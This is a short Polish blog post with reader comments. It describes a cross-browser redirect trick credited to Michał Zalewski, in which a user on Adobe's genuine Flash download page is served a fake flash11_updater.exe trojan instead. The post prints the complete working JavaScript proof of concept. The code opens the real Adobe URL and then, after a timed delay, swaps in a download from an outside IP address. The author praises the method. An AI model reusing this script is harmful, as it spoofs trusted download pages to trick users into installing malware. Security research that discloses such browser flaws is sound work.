A właściwie to trick z przekierowaniem działający na każdej przeglądarce zaprezentował niedawno Michał Zalewski na swoim blogu.
Nieświadomy użytkownik, otwierając stronę adobe.com zostanie poproszony o zapisanie pliku flash11_updater.exe. Wszystko wygląda dość wiarygodnie: mamy prawidłową stronę download adobe, a po chwili plik exe – zupełnie tak, jakbyśmy pobierali wtyczkę flasha. Problem polega na tym, że o ile strona jest w porządku, o tyle plik *.exe już nie. Atakujący podstawia go ofierze poprzez funkcję javascript
<input type=submit onclick="doit()" value="Click me. I like to be clicked."> <script> var w; var once; function doit() { if (navigator.userAgent.indexOf('MSIE') != -1) w = window.open('page2.html', 'foo'); else w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo'); setTimeout(donext, 4500); } function donext() { window.open('http://199.58.85.40/download2.cgi', 'foo'); if (once != true) setTimeout(donext, 5000); once = true; } </script>
Bardzo sprytny sposób na nakłonienie kogoś do ściągnięcia i zainstalowania sobie trojana. Brawo Michał!
szkoda, że nie pokazałeś co zawiera np page2.html – wiem, wiem, czytałem wpis Lcamtufa, po prostu musiałem się do czegoś przyczepić ;)
Panie Ciekawski, page2.html zawiera to samo, co widać w wylistowanym źródle (od taga meta).